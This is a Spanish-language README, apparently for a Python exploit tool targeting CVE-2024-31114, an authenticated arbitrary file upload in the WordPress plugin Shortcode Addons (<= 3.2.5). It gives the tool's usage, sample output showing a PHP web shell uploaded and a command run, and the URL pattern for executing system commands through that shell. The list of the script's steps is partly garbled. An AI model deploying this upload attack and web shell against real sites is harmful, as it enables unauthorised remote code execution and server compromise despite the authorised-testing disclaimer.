
Shortcode Addons <= 3.2.5 - Carga Arbitraria de Archivos Autenticada (Admin+)
Shortcode Addons <= 3.2.5 – Subida arbitraria de archivos autenticada (Admin+)
CVE ID: CVE-2024-31114
Puntuación CVSS: 9.1 (Crítica)
El complemento Shortcode Addons – con Visual Composer, Divi, Beaver Builder y Elementor Extension para WordPress es vulnerable a la subida arbitraria de archivos debido a la falta de validación del tipo de archivo en todas las versiones hasta la 3.2.5 inclusive.
Esta falla permite a atacantes autenticados con acceso de nivel administrador o superior subir archivos arbitrarios al servidor, lo que puede conducir a una ejecución remota de código (RCE).
Este script de Python automatiza la explotación de esta vulnerabilidad. Realiza lo siguiente:
_wpnonce)nxploit.php).zipwhoami en el servidor objetivousage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target URL (e.g. http://target.com)
-un, --username USERNAME WordPress Admin Username
-p, --password PASSWORD WordPress Admin Password
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
Una vez que se haya subido el payload, puedes ejecutar comandos del sistema utilizando el siguiente formato:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
🔹 Ejemplo:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
Esto listará el contenido del directorio actual en el servidor.
Esta herramienta es solo para fines educativos y de pruebas autorizadas.
El autor no es responsable de ningún uso indebido o daño causado por este script.
Úsala de forma responsable y solo en sistemas en los que tengas permiso explícito para realizar pruebas.
Por: Nxploited | Khaled Alenazi